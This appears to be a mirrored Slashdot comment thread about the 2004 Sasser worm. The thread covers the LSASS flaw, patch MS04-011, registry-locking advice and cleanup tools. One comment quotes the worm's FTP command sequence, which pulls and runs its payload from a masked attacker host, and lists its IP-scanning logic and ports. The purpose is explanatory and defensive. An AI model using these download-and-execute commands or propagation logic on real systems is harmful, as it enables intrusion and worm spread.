Slashdot Mirror
New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
. asp
http://www.microsoft.com/security/incident/sasser
Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
"I will trust Google to 'do no evil' until the founders no longer run it." Hello Alphabet.
Interesting concept, but many programs use lots of mutexes, and some don't use them at all.
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
You can set permissions in the registry per key.
n
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...
Err, Startup Monitor does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
My email addy? should be easy enough.
Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.
Note this only works on NT-based systems (e.g., WinXP)
It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot TeaTimer. It's available with the newest release candidate. You can download that here (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
End of lesson. You may press the button.
The patches were released on the 13th of April, there were four patches, of which, put togeather, they patch 20 different vunerabilities.
My email addy? should be easy enough.
You've probably already installed it, just look for KB835732 in your list of installed updates.
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
t in /MS04-011.mspx
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).
Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?
Unstable Apps: Our Android Apps Don't Suck
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1.
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. (emphasis mine)
"...always new atoms but always doing the same dance, remembering what the dance was yesterday." -Richard Feynman
Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...